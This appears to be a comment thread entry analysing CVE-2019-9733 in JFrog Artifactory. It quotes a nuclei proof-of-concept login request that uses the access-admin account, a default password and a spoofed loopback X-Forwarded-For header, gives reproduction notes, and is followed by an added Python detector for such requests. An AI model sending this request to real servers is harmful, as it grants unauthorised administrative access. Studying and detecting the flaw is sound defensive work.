Replies: 1 comment
1. This endpoint is the login endpoint; it allows logging in by entering an account and password.
According to Alibaba Cloud's analysis at https://avd.aliyun.com/detail?id=AVD-2019-9733
and the analysis of the nuclei PoC:
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
X-Requested-With: artUI
X-Forwarded-For: 127.0.0.1
Request-Agent: artifactoryUI
Content-Type: application/json
Origin: {{BaseURL}}
Referer: {{BaseURL}}/artifactory/webapp/

{"user":"access-admin","password":"password","type":"login"}
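On reproducing this, I found that the default password of access-admin in the image is not password. After logging in as admin and then modifying access-admin, I found that login also works without X-Forwarded-For: 127.0.0.1.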
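
A defender-side check for the request quoted above, as an added example that is not part of the original post or of the nuclei template: it flags requests to this login endpoint that claim a loopback X-Forwarded-For from a non-loopback peer, or that name access-admin. The function names, reason strings, placeholder host and the idea that `peer_ip` is the TCP source address seen at the edge are assumptions made for illustration.

```python
import ipaddress
import json

LOGIN_PATH = "/artifactory/ui/auth/login"

# Constructed sample shaped like the request in the post; host is a placeholder.
SAMPLE = (
    "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\n"
    "Host: artifactory.example\n"
    "X-Forwarded-For: 127.0.0.1\n"
    "\n"
    '{"user":"access-admin","password":"<redacted>","type":"login"}'
)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body

def is_loopback(value):
    try:
        return ipaddress.ip_address(value.strip()).is_loopback
    except ValueError:
        return False

def flag_login(peer_ip, raw):
    """Return reasons to review this request; peer_ip is the TCP source address."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != LOGIN_PATH:
        return []
    reasons = []
    xff = headers.get("x-forwarded-for", "")
    # A remote peer claiming a loopback origin is supplying the header itself.
    if xff and is_loopback(xff.split(",")[0]) and not is_loopback(peer_ip):
        reasons.append("spoofed-loopback-xff")
    try:
        user = json.loads(body).get("user")
    except (ValueError, AttributeError):
        user = None
    # Flagged independently of the header, since the post reports login without it.
    if user == "access-admin":
        reasons.append("access-admin-login")
    return reasons
```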